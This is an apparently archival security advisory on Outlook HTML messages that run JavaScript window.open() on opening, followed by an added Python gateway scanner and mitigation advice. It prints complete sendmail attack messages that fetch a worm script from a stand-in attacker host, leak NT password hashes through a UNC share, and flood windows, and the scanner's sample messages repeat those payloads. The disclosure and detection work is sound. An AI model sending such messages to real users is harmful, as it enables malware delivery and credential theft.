COMMAND

    Outlook

SYSTEMS AFFECTED

    Microsoft Outlook

PROBLEM

    cassius found the following.  Outlook HTML messages with embedded
    JavaScript window.open() calls can automatically open malicious
    URLs as soon as the message is opened.  An attacker could use this
    to make it appear that the user has received an attachment that
    has passed all SMTP scanners, when in fact the message carries no
    attachment at all: the file is fetched from the attacker's web
    server only after the victim opens the mail, so there is nothing
    for an attachment scanner to inspect in transit.  The risk here is
    high, as this vulnerability could allow another 'ILoveYou' type
    virus to propagate with minimal resistance.

    This vulnerability also opens Outlook, and possibly other HTML and
    JavaScript enabled e-mail clients, to a variety of other malicious
    URL attacks; the possible variations seem endless.  He has been
    able to send messages that, when opened, automatically send an NT
    user's password hash (strictly, the LM/NTLM challenge-response,
    which is enough to crack the password offline) to a box running
    L0phtCrack in SMB packet capture mode.  This is a variation on a
    known attack that relies on social engineering to get the victim
    to click on a link within the message; here no click is needed.

    He has tested the following exploits against Outlook 2000 and
    Outlook Express.  Presumably all versions that render HTML messages
    with embedded JavaScript are vulnerable.  Outlook 2000 is not
    vulnerable when the message is only viewed in the preview pane, or
    once the Outlook E-mail Security Update has been installed.

    The following examples use Sendmail to craft the messages, because
    Outlook itself does not normally give you enough control over the
    HTML message source to send them.  Each message is typed on stdin
    and terminated with a line containing a single "."; note that the
    attack payload is nothing more than a text/html body with a
    <script> block, so no MIME attachment is ever present.

    Example 1 - Sending Fake Attachments
    ====================================

        % sendmail victim@example.com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: I love you not.

        <html><script language="JavaScript"><!--
        window.open('http://evilcomputer.example.com/worm.vbs');
        --></script>I have attached a file for you.</html>
        
        .

    When the victim opens the message, an Internet Explorer dialog box
    is displayed that prompts the user to open the file or download it.
    An unsuspecting user could be tricked into thinking that this
    'attachment' has passed all SMTP security scans, although the
    scanners never saw it: worm.vbs is retrieved over HTTP at the
    moment the message is opened.

    Example 2 - Requesting NT Password Hashes
    =========================================
    Set up L0phtCrack to sniff SMB packets on evilcomputer.  Then send
    the following message.  When it is opened, the victim's machine
    connects to the UNC share and authenticates automatically with the
    logged-on user's credentials, so the captured SMB exchange contains
    the challenge-response that L0phtCrack cracks.

        % sendmail victim@example.com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: Give me your hash.
        
        <html><script language="JavaScript"><!--
        window.open('file:////evilcomputer/sharename/thankyou.html');
        --></script>Blah blah blah.</html>
        
        .

    Example 3 - Annoying DoS Attack
    ===============================

        % sendmail victim@example.com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: b00m!
        
        <html><script language="JavaScript"><!--
        for (loop=0; loop < 1000; loop++) { window.open('about:<b><h1>Die!'); }
        --></script></html>
        
        .
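
    None of the three messages above contains an attachment, which is
    why attachment-oriented SMTP scanners pass them.  What a gateway
    can check instead is the HTML body itself.  The following Python
    script is an added example, not part of the original advisory or
    of any product: it parses a raw MIME message with the standard
    email module, walks every text/html part (including the HTML half
    of a multipart/alternative message), and flags inline <script>
    blocks, window.open() calls and file:// URLs whose first path
    component is a host name, i.e. the UNC form used in Example 2.  The
    sample messages are constructed here to mirror Examples 1 and 2,
    plus a multipart variant and a benign message with a local
    file:///C:/ link that must not be flagged; the host names, share
    names and rule names are assumptions.

```python
import re
from email import message_from_string
from email.message import Message

# Three heuristics that cover the advisory's examples: an inline <script>,
# a window.open() call, and a file:// URL whose first path component is a
# host name (a UNC share, the form that makes the client authenticate over
# SMB). "file:///C:/..." has a drive letter, not a host, and is not flagged.
SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)
WINDOW_OPEN_RE = re.compile(r"window\s*\.\s*open\s*\(", re.IGNORECASE)
UNC_FILE_RE = re.compile(r"file:/{2,}[A-Za-z0-9._-]+/", re.IGNORECASE)


def html_parts(msg: Message):
    """Yield the decoded text of every text/html part, walking multiparts."""
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        payload = part.get_payload(decode=True)  # undoes base64/QP if present
        if payload is None:
            continue
        charset = part.get_content_charset() or "latin-1"
        yield payload.decode(charset, errors="replace")


def scan_message(raw: str) -> list:
    """Return the list of findings for one raw message; [] means clean."""
    findings = []
    for html in html_parts(message_from_string(raw)):
        if SCRIPT_RE.search(html):
            findings.append("script-block")
        if WINDOW_OPEN_RE.search(html):
            findings.append("window.open")
        if UNC_FILE_RE.search(html):
            findings.append("unc-file-url")
    return list(dict.fromkeys(findings))  # de-duplicate, keep order


# Constructed samples mirroring the advisory's messages (hypothetical hosts).
# The trailing "." in the advisory is sendmail's end-of-input marker, not
# part of the mail, so it is omitted here.
FAKE_ATTACHMENT = """\
MIME-Version: 1.0
Content-Type: text/html
Subject: I love you not.

<html><script language="JavaScript"><!--
window.open('http://evilcomputer.example.com/worm.vbs');
--></script>I have attached a file for you.</html>
"""

HASH_GRAB = """\
MIME-Version: 1.0
Content-Type: text/html
Subject: Give me your hash.

<html><script language="JavaScript"><!--
window.open('file:////evilcomputer/sharename/thankyou.html');
--></script>Blah blah blah.</html>
"""

# The same UNC trick hidden in the HTML half of a multipart/alternative
# message, which is how real mail clients usually send HTML.
HIDDEN_IN_MULTIPART = """\
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"
Subject: Nothing to see here

--b1
Content-Type: text/plain

Plain-text readers see only this.
--b1
Content-Type: text/html

<html><SCRIPT>window.open('file://evilcomputer/share/x.html');</SCRIPT></html>
--b1--
"""

# Benign: a local drive-letter file link, no script, must pass.
CLEAN = """\
MIME-Version: 1.0
Content-Type: text/html
Subject: Meeting notes

<html><p>Notes are on <a href="file:///C:/notes.html">your C: drive</a>.</p></html>
"""

SAMPLES = {
    "fake-attachment": FAKE_ATTACHMENT,
    "hash-grab": HASH_GRAB,
    "hidden-in-multipart": HIDDEN_IN_MULTIPART,
    "clean": CLEAN,
}


def scan_all() -> dict:
    """Scan every sample; a gateway would quarantine any non-empty result."""
    return {name: scan_message(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_all().items():
        verdict = "QUARANTINE" if findings else "pass"
        print(f"{name:22s} {verdict:10s} {findings}")
```

    The checks are deliberately crude string matches on the decoded
    HTML, which is the right layer for a gateway: the client-side
    tricks in the advisory (HTML comments around the script, odd
    numbers of slashes in the file: URL, mixed case tags) all survive
    MIME decoding unchanged, so the regexes see exactly what Outlook
    would render.  A production filter would also want to look at
    <iframe>, <object> and event-handler attributes, which the
    advisory does not cover.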

SOLUTION

    The solution for Outlook 98/2000 users is to install the Outlook
    E-mail Security Update.  Outlook Express users should upgrade to
    Outlook 2000 or some other mail client.  As a general mitigation
    for any client that renders HTML mail, disable Active Scripting in
    the Internet Explorer security zone the mail client uses (Outlook
    Express can be pointed at the Restricted sites zone from its
    Security options), and consider stripping or quarantining HTML
    messages that contain <script> blocks at the mail gateway, since
    the attachment scanning these attacks sidestep never sees the URL
    being opened.